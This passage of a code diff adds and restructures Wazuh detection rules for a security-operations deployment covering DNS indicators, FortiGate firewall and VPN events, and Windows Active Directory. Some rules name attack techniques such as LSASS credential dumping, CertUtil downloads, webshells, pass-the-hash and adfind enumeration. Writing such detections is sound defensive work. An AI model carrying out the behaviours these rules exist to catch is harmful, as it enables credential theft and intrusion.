-  <rule id="100335" level="12"><if_sid>100210</if_sid><match>usecase_id=A3-05</match><description>A3-05 VPN Authentication Success from Outside Thailand</description><group>soc_mvp_test,appendix_a,a3,vpn,</group></rule>
53 
-
54 
-  <!-- Appendix A4 (Windows/AD) -->
55 
-  <rule id="100341" level="8"><if_sid>100210</if_sid><match>usecase_id=A4-01</match><description>A4-01 Windows Authentication Multiple Fail from Privileged Account</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
56 
-  <rule id="100342" level="8"><if_sid>100210</if_sid><match>usecase_id=A4-02</match><description>A4-02 Windows Authentication Multiple Fail from Service Account</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
57 
-  <rule id="100343" level="8"><if_sid>100210</if_sid><match>usecase_id=A4-03</match><description>A4-03 Windows AD Enumeration with Malicious Tools</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
58 
-  <rule id="100344" level="8"><if_sid>100210</if_sid><match>usecase_id=A4-04</match><description>A4-04 Windows Authentication Fail from Public IPs</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
59 
-  <rule id="100345" level="8"><if_sid>100210</if_sid><match>usecase_id=A4-05</match><description>A4-05 Windows File Share Enumeration to Single Destination</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
60 
-  <rule id="100346" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-06</match><description>A4-06 Windows Authentication Success from Public IPs</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
61 
-  <rule id="100347" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-07</match><description>A4-07 Windows Authentication Privileged Account Impersonation</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
62 
-  <rule id="100348" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-08</match><description>A4-08 Windows Authentication Successful Pass the Hash RDP</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
63 
-  <rule id="100349" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-09</match><description>A4-09 Windows Authentication Success from Guest Account</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
64 
-  <rule id="100350" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-10</match><description>A4-10 Windows Authentication Interactive Logon Success by Service Account</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
65 
-  <rule id="100351" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-11</match><description>A4-11 Windows Account Added to Privileged Custom Group</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
66 
-  <rule id="100352" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-12</match><description>A4-12 Windows Account Added to Privileged Group</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
67 
-  <rule id="100353" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-13</match><description>A4-13 Windows Domain Configure DSRM Password Reset</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
68 
-  <rule id="100354" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-14</match><description>A4-14 Windows Authentication Multiple Fail One Account from Many Sources</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
69 
-  <rule id="100355" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-15</match><description>A4-15 Windows Authentication Multiple Fail Many Accounts from One Source</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
70 
-  <rule id="100356" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-16</match><description>A4-16 Windows Authentication Multiple Fail from Guest Account</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
71 
-  <rule id="100357" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-17</match><description>A4-17 Windows Authentication Multiple Fail One Account from One Source</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
72 
-  <rule id="100358" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-18</match><description>A4-18 Windows Authentication Multiple Interactive Logon Denied</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
73 
-  <rule id="100359" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-19</match><description>A4-19 Windows Authentication Password Spray</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
74 
-  <rule id="100360" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-20</match><description>A4-20 Windows Authentication Attempt from Disabled Account</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
75 
-  <rule id="100361" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-21</match><description>A4-21 Windows Domain Account Created</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
76 
-  <rule id="100362" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-22</match><description>A4-22 Windows Local Account Re Enabled</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
77 
-  <rule id="100363" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-23</match><description>A4-23 Windows Local Account Created</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
78 
-  <rule id="100364" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-24</match><description>A4-24 Windows Domain Account Re Enabled</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
79 
-
80 
-  <!-- Appendix B1 (VMware vCenter/ESXi) -->
81 
-  <rule id="100401" level="12"><if_sid>100220</if_sid><match>usecase_id=B1-01</match><description>B1-01 vCenter GUI Login Failed 5 Times and Success 1 Time</description><group>soc_mvp_test,appendix_b,b1,vmware,</group></rule>
82 
-  <rule id="100402" level="8"><if_sid>100220</if_sid><match>usecase_id=B1-02</match><description>B1-02 ESXi Enable SSH on Hosts</description><group>soc_mvp_test,appendix_b,b1,vmware,</group></rule>
83 
-  <rule id="100403" level="12"><if_sid>100220</if_sid><match>usecase_id=B1-03</match><description>B1-03 ESXi SSH Failed 5 Times and Success 1 Time</description><group>soc_mvp_test,appendix_b,b1,vmware,</group></rule>
84 
-
85 
-  <!-- Appendix B2 (Log monitoring) -->
86 
-  <rule id="100411" level="5"><if_sid>100220</if_sid><match>usecase_id=B2-01</match><description>B2-01 Log Monitor Logs Loss Detection</description><group>soc_mvp_test,appendix_b,b2,logmonitor,</group></rule>
87 
-
88 
-  <!-- Appendix B3 (Windows Sysmon) -->
89 
-  <rule id="100421" level="12"><if_sid>100220</if_sid><match>usecase_id=B3-01</match><description>B3-01 Sysmon LSASS Dumping</description><group>soc_mvp_test,appendix_b,b3,sysmon,</group></rule>
90 
-  <rule id="100422" level="12"><if_sid>100220</if_sid><match>usecase_id=B3-02</match><description>B3-02 Sysmon SQL Injection</description><group>soc_mvp_test,appendix_b,b3,sysmon,</group></rule>
91 
-  <rule id="100423" level="12"><if_sid>100220</if_sid><match>usecase_id=B3-03</match><description>B3-03 Sysmon Webshell</description><group>soc_mvp_test,appendix_b,b3,sysmon,</group></rule>
92 
-  <rule id="100424" level="12"><if_sid>100220</if_sid><match>usecase_id=B3-04</match><description>B3-04 Sysmon Uninstall</description><group>soc_mvp_test,appendix_b,b3,sysmon,</group></rule>
93 
-  <rule id="100425" level="12"><if_sid>100220</if_sid><match>usecase_id=B3-05</match><description>B3-05 Sysmon LSASS Dumping by Task Manager</description><group>soc_mvp_test,appendix_b,b3,sysmon,</group></rule>
94 
-  <rule id="100426" level="8"><if_sid>100220</if_sid><match>usecase_id=B3-06</match><description>B3-06 Sysmon CertUtil Download</description><group>soc_mvp_test,appendix_b,b3,sysmon,</group></rule>
95 
-
96 
-  <!-- Appendix C1 (Impossible travel) -->
97 
-  <rule id="100501" level="12"><if_sid>100230</if_sid><match>usecase_id=C1-01</match><description>C1-01 Impossible Travel Detection</description><group>soc_mvp_test,appendix_c,c1,identity,</group></rule>
98 
-
99 
-  <!-- Appendix C2 (Credential abuse & privilege misuse) -->
100 
-  <rule id="100511" level="12"><if_sid>100230</if_sid><match>usecase_id=C2-01</match><description>C2-01 Privileged Account Usage Outside Business Hours</description><group>soc_mvp_test,appendix_c,c2,identity,</group></rule>
101 
-  <rule id="100512" level="8"><if_sid>100230</if_sid><match>usecase_id=C2-02</match><description>C2-02 Dormant Account Activation</description><group>soc_mvp_test,appendix_c,c2,identity,</group></rule>
102 
-  <rule id="100513" level="12"><if_sid>100230</if_sid><match>usecase_id=C2-03</match><description>C2-03 Service Account Interactive Logon</description><group>soc_mvp_test,appendix_c,c2,identity,</group></rule>
103 
-  <rule id="100514" level="12"><if_sid>100230</if_sid><match>usecase_id=C2-04</match><description>C2-04 Rapid Privilege Escalation Followed by Sensitive Access</description><group>soc_mvp_test,appendix_c,c2,identity,</group></rule>
104 
-
105 
-  <!-- Appendix C3 (Lateral movement & internal recon) -->
106 
-  <rule id="100521" level="12"><if_sid>100230</if_sid><match>usecase_id=C3-01</match><description>C3-01 Multiple Authentication Success Across Hosts</description><group>soc_mvp_test,appendix_c,c3,lateral_movement,</group></rule>
107 
-  <rule id="100522" level="12"><if_sid>100230</if_sid><match>usecase_id=C3-02</match><description>C3-02 SMB/RDP Lateral Burst Pattern</description><group>soc_mvp_test,appendix_c,c3,lateral_movement,</group></rule>
108 
-  <rule id="100523" level="12"><if_sid>100230</if_sid><match>usecase_id=C3-03</match><description>C3-03 Admin Account Accessing Many Servers Rapidly</description><group>soc_mvp_test,appendix_c,c3,lateral_movement,</group></rule>
109 
-  <rule id="100524" level="8"><if_sid>100230</if_sid><match>usecase_id=C3-04</match><description>C3-04 Internal Scanning / Enumeration Behavior</description><group>soc_mvp_test,appendix_c,c3,recon,</group></rule>
110 
-  <!-- ========================= -->
111 
-  <!-- Production profile rules -->
112 
-  <!-- ========================= -->
113 
-  <!--
114 
-    Production profile (second profile):
115 
-    - Does not depend on simulation marker fields (soc_mvp_test/usecase_id)
116 
-    - Uses source-like patterns that can appear in real logs
117 
-    - Rule IDs are separated from simulation profile in 110xxx range
118 
-  -->
119 
-
120 
-  <rule id="110200" level="3">
121 
-    <description>SOC MVP production profile enabled</description>
122 
-    <group>soc_mvp_prod,baseline,</group>
123 
-  </rule>
124 
-
125 
-  <!-- Appendix A1: DNS / Firewall IOC -->
126 
-  <rule id="110301" level="8">
127 
-    <decoded_as>soc-dns-ioc</decoded_as>
128 
-    <match>event_type=ioc_dns_traffic</match>
129 
-    <match>malicious.example</match>
130 
-    <description>A1 production: DNS query to malicious domain indicator</description>
131 
-    <group>soc_mvp_prod,appendix_a,a1,ioc,dns,</group>
132 
-  </rule>
133 
-  <rule id="110302" level="8">
134 
-    <decoded_as>soc-dns-ioc</decoded_as>
135 
-    <match>event_type=ioc_domain_match</match>
136 
-    <description>A1 production: DNS IOC domain match event</description>
137 
-    <group>soc_mvp_prod,appendix_a,a1,ioc,dns,</group>
138 
-  </rule>
139 
-
140 
-  <!-- Appendix A2: FortiGate IPS/IDS & Firewall -->
141 
-  <rule id="110311" level="12">
142 
-    <match>vendor=fortinet</match>
143 
-    <match>dstport=3389</match>
144 
-    <match>action="accept"</match>
145 
-    <description>A2 production: FortiGate allowed RDP traffic detected</description>
146 
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
147 
-  </rule>
148 
-  <rule id="110312" level="12">
149 
-    <match>vendor=fortinet</match>
150 
-    <match>action="password-change"</match>
151 
-    <description>A2 production: FortiGate admin password change</description>
152 
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
153 
-  </rule>
154 
-  <rule id="110313" level="12">
155 
-    <match>vendor=fortinet</match>
156 
-    <match>action="create-admin"</match>
157 
-    <description>A2 production: FortiGate admin account creation</description>
158 
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
159 
-  </rule>
160 
-  <rule id="110314" level="12">
161 
-    <match>vendor=fortinet</match>
162 
-    <match>action="disable-email-notification"</match>
163 
-    <description>A2 production: FortiGate email notification disabled</description>
164 
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
165 
-  </rule>
166 
-  <rule id="110315" level="5">
167 
-    <match>vendor=fortinet</match>
168 
-    <match>action="download-config"</match>
169 
-    <description>A2 production: FortiGate configuration download</description>
170 
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
171 
-  </rule>
172 
-  <rule id="110316" level="8">
173 
-    <match>vendor=fortinet</match>
174 
-    <match>subtype="ips"</match>
175 
-    <match>severity="critical"</match>
176 
-    <description>A2 production: FortiGate critical IPS alert</description>
177 
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,ips,</group>
178 
-  </rule>
179 
-  <rule id="110317" level="5">
180 
-    <match>vendor=fortinet</match>
181 
-    <match>event_type=port_scan</match>
182 
-    <description>A2 production: FortiGate port scanning indicator</description>
183 
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,recon,</group>
184 
-  </rule>
185 
-  <rule id="110318" level="8">
186 
-    <match>vendor=fortinet</match>
187 
-    <match>event_type=ioc_detection</match>
188 
-    <description>A2 production: FortiGate IOC detection event</description>
189 
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,ioc,</group>
190 
-  </rule>
191 
-  <rule id="110320" level="8">
192 
-    <match>vendor=fortinet</match>
193 
-    <match>event_type=malicious_ip_communication</match>
194 
-    <description>A2 production: Communication to malicious IP detected</description>
195 
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,ioc,</group>
196 
-  </rule>
197 
-
198 
-  <!-- Appendix A3: FortiGate VPN -->
199 
-  <rule id="110331" level="12">
200 
-    <match>subtype="vpn"</match>
201 
-    <match>success=true</match>
202 
-    <match>guest</match>
203 
-    <description>A3 production: VPN success by guest account</description>
204 
-    <group>soc_mvp_prod,appendix_a,a3,vpn,</group>
205 
-  </rule>
206 
-  <rule id="110333" level="12">
207 
-    <match>subtype="vpn"</match>
208 
-    <match>event_type=vpn_bruteforce_success</match>
209 
-    <description>A3 production: VPN brute-force success indicator</description>
210 
-    <group>soc_mvp_prod,appendix_a,a3,vpn,</group>
211 
-  </rule>
212 
-  <rule id="110335" level="12">
213 
-    <match>subtype="vpn"</match>
214 
-    <match>success=true</match>
215 
-    <match>country=</match>
216 
-    <description>A3 production: VPN success with country context (geo-anomaly candidate)</description>
217 
-    <group>soc_mvp_prod,appendix_a,a3,vpn,geo,</group>
218 
-  </rule>
219 
-
220 
-  <!-- Appendix A4: Windows / Active Directory -->
221 
-  <rule id="110341" level="8">
222 
-    <match>source=windows</match>
223 
-    <match>event_id=4625</match>
224 
-    <match>is_admin=true</match>
225 
-    <description>A4 production: Privileged account authentication failures</description>
226 
-    <group>soc_mvp_prod,appendix_a,a4,windows,auth_fail,</group>
227 
-  </rule>
228 
-  <rule id="110342" level="8">
229 
-    <match>source=windows</match>
230 
-    <match>event_id=4625</match>
231 
-    <match>is_service=true</match>
232 
-    <description>A4 production: Service account authentication failures</description>
233 
-    <group>soc_mvp_prod,appendix_a,a4,windows,auth_fail,</group>
234 
-  </rule>
235 
-  <rule id="110346" level="12">
236 
-    <match>source=windows</match>
237 
-    <match>event_id=4624</match>
238 
-    <match>src_ip=</match>
239 
-    <description>A4 production: Windows successful authentication with source IP context</description>
240 
-    <group>soc_mvp_prod,appendix_a,a4,windows,auth_success,</group>
241 
-  </rule>
242 
-  <rule id="110352" level="12">
243 
-    <match>source=windows</match>
244 
-    <match>event_id=4728</match>
245 
-    <match>target_group=</match>
246 
-    <description>A4 production: Account added to privileged group (domain scope)</description>
247 
-    <group>soc_mvp_prod,appendix_a,a4,windows,privilege,</group>
248 
-  </rule>
249 
-  <rule id="110353" level="12">
250 
-    <match>source=windows</match>
251 
-    <match>event_id=4732</match>
252 
-    <match>target_group=</match>
253 
-    <description>A4 production: Account added to privileged group (local scope)</description>
254 
-    <group>soc_mvp_prod,appendix_a,a4,windows,privilege,</group>
255 
-  </rule>
256 
-
257 
-  <!-- Appendix B1: VMware -->
258 
-  <rule id="110401" level="12">
259 
-    <decoded_as>soc-vmware-auth</decoded_as>
260 
-    <match>event_type=vmware_</match>
261 
-    <match>_fail_success</match>
262 
-    <description>B1 production: vCenter login burst pattern</description>
263 
-    <group>soc_mvp_prod,appendix_b,b1,vmware,</group>
264 
-  </rule>
265 
-  <rule id="110402" level="8">
266 
-    <decoded_as>soc-vmware-auth</decoded_as>
267 
-    <match>event_type=vmware_esxi_enable_ssh</match>
268 
-    <description>B1 production: ESXi SSH enabled</description>
269 
-    <group>soc_mvp_prod,appendix_b,b1,vmware,</group>
270 
-  </rule>
271 
-
272 
-  <!-- Appendix B2: Log monitoring -->
273 
-  <rule id="110411" level="5">
274 
-    <decoded_as>soc-log-monitor</decoded_as>
275 
-    <match>event_type=log_loss_detection</match>
276 
-    <match>missing_stream=</match>
277 
-    <description>B2 production: Log loss detection signal</description>
278 
-    <group>soc_mvp_prod,appendix_b,b2,logmonitor,</group>
279 
-  </rule>
280 
-
281 
-  <!-- Appendix B3: Sysmon -->
282 
-  <rule id="110421" level="12">
283 
-    <decoded_as>soc-windows-sysmon</decoded_as>
284 
-    <match>target_process=lsass.exe</match>
285 
-    <description>B3 production: LSASS dump behavior</description>
286 
-    <group>soc_mvp_prod,appendix_b,b3,sysmon,credential_access,</group>
287 
-  </rule>
288 
-  <rule id="110426" level="8">
289 
-    <decoded_as>soc-windows-sysmon</decoded_as>
290 
-    <match>process=certutil.exe</match>
291 
-    <description>B3 production: CertUtil download pattern</description>
292 
-    <group>soc_mvp_prod,appendix_b,b3,sysmon,</group>
293 
-  </rule>
294 
-
295 
-  <!-- Appendix C1-C3: future enhancement (production-prep heuristics) -->
296 
-  <rule id="110501" level="12">
297 
-    <match>event_type=c1_impossible_travel</match>
298 
-    <description>C1 production: Impossible travel correlated event</description>
299 
-    <group>soc_mvp_prod,appendix_c,c1,identity,</group>
300 
-  </rule>
301 
-  <rule id="110511" level="12">
302 
-    <match>event_type=c2_credential_abuse</match>
303 
-    <description>C2 production: Credential abuse correlated event</description>
304 
-    <group>soc_mvp_prod,appendix_c,c2,identity,</group>
305 
-  </rule>
306 
-  <rule id="110521" level="12">
307 
-    <match>event_type=c3_lateral_movement</match>
308 
-    <description>C3 production: Lateral movement correlated event</description>
309 
-    <group>soc_mvp_prod,appendix_c,c3,lateral_movement,</group>
310 
-  </rule>
311 21 
 </group>

+ 47 - 0
wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a1-ioc-rules.xml
ファイルの表示 

@@ -0,0 +1,47 @@
1 
+<!--
2 
+  SOC Proposal Rules — Appendix A1: DNS / Firewall IOC
3 
+  Simulation profile rule IDs : 100301-100302
4 
+  Production profile rule IDs : 110301-110302
5 
+
6 
+  Severity mapping:
7 
+    Medium → level 8
8 
+
9 
+  Decoded fields used (soc-mvp-dns):
10 
+    status     = event_type  (ioc_dns_traffic | ioc_domain_match)
11 
+    srcip      = source IP
12 
+    url        = queried domain
13 
+    action     = blocked | alert
14 
+-->
15 
+<group name="soc_mvp,appendix_a,a1,ioc,dns,">
16 
+
17 
+  <!-- ── Simulation profile (usecase_id markers present) ── -->
18 
+
19 
+
20 
+
21 
+  <!-- ── Production profile (field-based matching) ── -->
22 
+
23 
+  <rule id="110301" level="8">
24 
+    <if_sid>100250</if_sid>
25 
+    <match>event_type=ioc_dns_traffic</match>
26 
+    <description>A1-01 [PROD] DNS query to malicious domain (IOC traffic indicator)</description>
27 
+    <group>soc_prod,a1,ioc,</group>
28 
+    <mitre>
29 
+      <id>T1071.004</id>
30 
+    </mitre>
31 
+  </rule>
32 
+
33 
+  <rule id="110302" level="8">
34 
+    <if_sid>100250</if_sid>
35 
+    <match>event_type=ioc_domain_match</match>
36 
+    <description>A1-02 [PROD] DNS IOC domain match from threat intelligence feed</description>
37 
+    <group>soc_prod,a1,ioc,</group>
38 
+    <mitre>
39 
+      <id>T1568</id>
40 
+    </mitre>
41 
+  </rule>
42 
+
43 
+  <!-- ── Production normalized key=value path (soc-mvp production profile) ── -->
44 
+
45 
+
46 
+
47 
+</group>

+ 113 - 0
wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a2-fortigate-fw-rules.xml
ファイルの表示 

@@ -0,0 +1,113 @@
1 
+<!--
2 
+  SOC Proposal Rules — Appendix A2: FortiGate IPS/IDS & Firewall
3 
+  Simulation profile rule IDs : 100311-100320
4 
+  Production profile rule IDs : 110311-110320
5 
+
6 
+  Severity mapping:
7 
+    High   → level 12
8 
+    Medium → level 8
9 
+    Low    → level 5
10 
+-->
11 
+<group name="soc_mvp,appendix_a,a2,fortigate,">
12 
+
13 
+  <!-- ── Simulation profile ── -->
14 
+
15 
+
16 
+
17 
+
18 
+
19 
+
20 
+
21 
+
22 
+
23 
+
24 
+
25 
+  <!-- ── Production profile (if_group=fortigate, no soc_mvp_test required) ── -->
26 
+
27 
+  <rule id="110311" level="12">
28 
+    <if_group>fortigate</if_group>
29 
+    <match>dstport=3389</match>
30 
+    <match>action="accept"</match>
31 
+    <description>A2-01 [PROD] FortiGate: RDP (3389) traffic allowed</description>
32 
+    <group>soc_prod,a2,rdp,</group>
33 
+    <mitre><id>T1021.001</id></mitre>
34 
+  </rule>
35 
+
36 
+  <rule id="110312" level="12">
37 
+    <if_group>fortigate</if_group>
38 
+    <match>action="password-change"</match>
39 
+    <description>A2-02 [PROD] FortiGate: admin account password changed</description>
40 
+    <group>soc_prod,a2,admin_change,</group>
41 
+    <mitre><id>T1098</id></mitre>
42 
+  </rule>
43 
+
44 
+  <rule id="110313" level="12">
45 
+    <if_group>fortigate</if_group>
46 
+    <match>action="create-admin"</match>
47 
+    <description>A2-03 [PROD] FortiGate: new admin account created</description>
48 
+    <group>soc_prod,a2,admin_change,</group>
49 
+    <mitre><id>T1136</id></mitre>
50 
+  </rule>
51 
+
52 
+  <rule id="110314" level="12">
53 
+    <if_group>fortigate</if_group>
54 
+    <match>action="config-change"</match>
55 
+    <match>config_value=disable</match>
56 
+    <description>A2-04 [PROD] FortiGate: alerting/notification disabled via config change</description>
57 
+    <group>soc_prod,a2,defense_evasion,</group>
58 
+    <mitre><id>T1562</id></mitre>
59 
+  </rule>
60 
+
61 
+  <rule id="110315" level="5">
62 
+    <if_group>fortigate</if_group>
63 
+    <match>action="download-config"</match>
64 
+    <description>A2-05 [PROD] FortiGate: firewall configuration file downloaded</description>
65 
+    <group>soc_prod,a2,config,</group>
66 
+    <mitre><id>T1005</id></mitre>
67 
+  </rule>
68 
+
69 
+  <rule id="110316" level="8">
70 
+    <if_group>fortigate</if_group>
71 
+    <match>subtype="ips"</match>
72 
+    <match>attack="Multiple.Critical</match>
73 
+    <description>A2-06 [PROD] FortiGate IPS: multiple critical signatures triggered</description>
74 
+    <group>soc_prod,a2,ips,</group>
75 
+    <mitre><id>T1595</id></mitre>
76 
+  </rule>
77 
+
78 
+  <rule id="110317" level="5">
79 
+    <if_group>fortigate</if_group>
80 
+    <match>subtype="anomaly"</match>
81 
+    <match>attack="TCP.Port.Scan"</match>
82 
+    <description>A2-07 [PROD] FortiGate: TCP port scan from external IP</description>
83 
+    <group>soc_prod,a2,recon,</group>
84 
+    <mitre><id>T1046</id></mitre>
85 
+  </rule>
86 
+
87 
+  <rule id="110318" level="8">
88 
+    <if_group>fortigate</if_group>
89 
+    <match>subtype="ips"</match>
90 
+    <match>ioc_type=ip</match>
91 
+    <description>A2-08 [PROD] FortiGate IPS: IOC-based IP indicator detected</description>
92 
+    <group>soc_prod,a2,ioc,</group>
93 
+    <mitre><id>T1071.001</id></mitre>
94 
+  </rule>
95 
+
96 
+  <rule id="110319" level="8">
97 
+    <if_group>fortigate</if_group>
98 
+    <match>subtype="anomaly"</match>
99 
+    <match>attack="Internal.Port.Scan"</match>
100 
+    <description>A2-09 [PROD] FortiGate: internal port scan from private source IP</description>
101 
+    <group>soc_prod,a2,recon,</group>
102 
+    <mitre><id>T1046</id></mitre>
103 
+  </rule>
104 
+
105 
+  <rule id="110320" level="8">
106 
+    <if_group>fortigate</if_group>
107 
+    <match>threat_label="known-c2"</match>
108 
+    <description>A2-10 [PROD] FortiGate: traffic to known C2/malicious IP allowed</description>
109 
+    <group>soc_prod,a2,ioc,c2,</group>
110 
+    <mitre><id>T1071.001</id></mitre>
111 
+  </rule>
112 
+
113 
+</group>

+ 66 - 0
wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a3-fortigate-vpn-rules.xml
ファイルの表示 

@@ -0,0 +1,66 @@
1 
+<!--
2 
+  SOC Proposal Rules — Appendix A3: FortiGate VPN
3 
+  Simulation profile rule IDs : 100331-100335
4 
+  Production profile rule IDs : 110331-110335
5 
+
6 
+  Severity mapping:
7 
+    High → level 12
8 
+    Low  → level 5
9 
+-->
10 
+<group name="soc_mvp,appendix_a,a3,vpn,fortigate,">
11 
+
12 
+  <!-- ── Simulation profile ── -->
13 
+
14 
+
15 
+
16 
+
17 
+
18 
+
19 
+  <!-- ── Production profile (if_group=fortigate) ── -->
20 
+
21 
+  <rule id="110331" level="12">
22 
+    <if_group>fortigate</if_group>
23 
+    <match>action="ssl-login-success"</match>
24 
+    <match>user="guest"</match>
25 
+    <description>A3-01 [PROD] VPN authentication success by guest account</description>
26 
+    <group>soc_prod,a3,vpn_guest,</group>
27 
+    <mitre><id>T1078.001</id></mitre>
28 
+  </rule>
29 
+
30 
+  <rule id="110332" level="12">
31 
+    <if_group>fortigate</if_group>
32 
+    <match>action="ssl-login-success"</match>
33 
+    <match>previous_country=</match>
34 
+    <description>A3-02 [PROD] VPN success from different country than last login</description>
35 
+    <group>soc_prod,a3,vpn_geo,</group>
36 
+    <mitre><id>T1078</id></mitre>
37 
+  </rule>
38 
+
39 
+  <rule id="110333" level="12">
40 
+    <if_group>fortigate</if_group>
41 
+    <match>action="ssl-login-success"</match>
42 
+    <match>failed_attempts_before_success=</match>
43 
+    <description>A3-03 [PROD] VPN success after multiple prior failures (brute-force indicator)</description>
44 
+    <group>soc_prod,a3,vpn_bruteforce,</group>
45 
+    <mitre><id>T1110.001</id></mitre>
46 
+  </rule>
47 
+
48 
+  <rule id="110334" level="5">
49 
+    <if_group>fortigate</if_group>
50 
+    <match>action="ssl-login-fail"</match>
51 
+    <match>failed_accounts=</match>
52 
+    <description>A3-04 [PROD] VPN multiple account failures from single source IP</description>
53 
+    <group>soc_prod,a3,vpn_bruteforce,</group>
54 
+    <mitre><id>T1110.003</id></mitre>
55 
+  </rule>
56 
+
57 
+  <rule id="110335" level="12">
58 
+    <if_group>fortigate</if_group>
59 
+    <match>action="ssl-login-success"</match>
60 
+    <match>expected_country=TH</match>
61 
+    <description>A3-05 [PROD] VPN authentication success from outside Thailand</description>
62 
+    <group>soc_prod,a3,vpn_geo,</group>
63 
+    <mitre><id>T1078</id></mitre>
64 
+  </rule>
65 
+
66 
+</group>

+ 168 - 0
wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a4-windows-ad-rules.xml
ファイルの表示 

@@ -0,0 +1,168 @@
1 
+<!--
2 
+  SOC Proposal Rules — Appendix A4: Windows / Active Directory
3 
+  Simulation profile rule IDs : 100341-100364
4 
+  Production profile rule IDs : 110341-110364
5 
+
6 
+  Production rules use specific built-in Wazuh rule SIDs as parents
7 
+  to avoid the N×M rule-tree explosion from if_group=windows:
8 
+    60105/60122 → event 4625 (auth failure)
9 
+    60106       → event 4624 (auth success / logon)
10 
+    60109       → events 4720/4722 (account create/enable)
11 
+    60113       → events 4728/4732 (group membership change)
12 
+    67027       → event 4688 (new process created)
13 
+    60103       → event 4794 (DSRM password set)
14 
+-->
15 
+<group name="soc_mvp,appendix_a,a4,windows,">
16 
+
17 
+  <!-- ── Simulation profile ── -->
18 
+
19 
+
20 
+
21 
+
22 
+
23 
+
24 
+
25 
+
26 
+
27 
+
28 
+
29 
+
30 
+
31 
+
32 
+
33 
+
34 
+
35 
+
36 
+
37 
+
38 
+
39 
+
40 
+
41 
+
42 
+
43 
+  <!-- ── Production profile ──
44 
+       Parents are specific built-in Wazuh SIDs (not if_group=windows) to
45 
+       avoid N×M rule-tree explosion. Each parent fires for one event ID.
46 
+  -->
47 
+
48 
+  <!-- A4-01/02/19: Auth failures (event 4625)
49 
+       Parent: 60105 (4625 base), 60122 (4625 variant) -->
50 
+  <rule id="110341" level="8">
51 
+    <if_sid>60105, 60122</if_sid>
52 
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)admin</field>
53 
+    <description>A4-01 [PROD] Windows: privileged account name auth failure (4625)</description>
54 
+    <group>soc_prod,a4,auth_fail,</group>
55 
+    <mitre><id>T1110.001</id></mitre>
56 
+  </rule>
57 
+
58 
+  <rule id="110342" level="8">
59 
+    <if_sid>60105, 60122</if_sid>
60 
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)svc|service|\$$</field>
61 
+    <description>A4-02 [PROD] Windows: service account auth failure (4625)</description>
62 
+    <group>soc_prod,a4,auth_fail,</group>
63 
+    <mitre><id>T1110.001</id></mitre>
64 
+  </rule>
65 
+
66 
+  <rule id="110359" level="5">
67 
+    <if_sid>60105, 60122</if_sid>
68 
+    <description>A4-19 [PROD] Windows: authentication failure (4625)</description>
69 
+    <group>soc_prod,a4,spray,</group>
70 
+    <mitre><id>T1110.003</id></mitre>
71 
+  </rule>
72 
+
73 
+  <!-- A4-03: AD enumeration via process execution (event 4688)
74 
+       Parent: 67027 (new process created) -->
75 
+  <rule id="110343" level="8">
76 
+    <if_sid>67027</if_sid>
77 
+    <field name="win.eventdata.newProcessName" type="pcre2">(?i)adfind\.exe</field>
78 
+    <description>A4-03 [PROD] Windows AD: adfind enumeration tool executed (4688)</description>
79 
+    <group>soc_prod,a4,ad_enum,</group>
80 
+    <mitre><id>T1087.002</id></mitre>
81 
+  </rule>
82 
+
83 
+  <!-- A4-06/07/08/09/10: Auth successes (event 4624)
84 
+       Parent: 60106 (logon success) -->
85 
+  <rule id="110346" level="12">
86 
+    <if_sid>60106</if_sid>
87 
+    <field name="win.eventdata.logonType">^10$</field>
88 
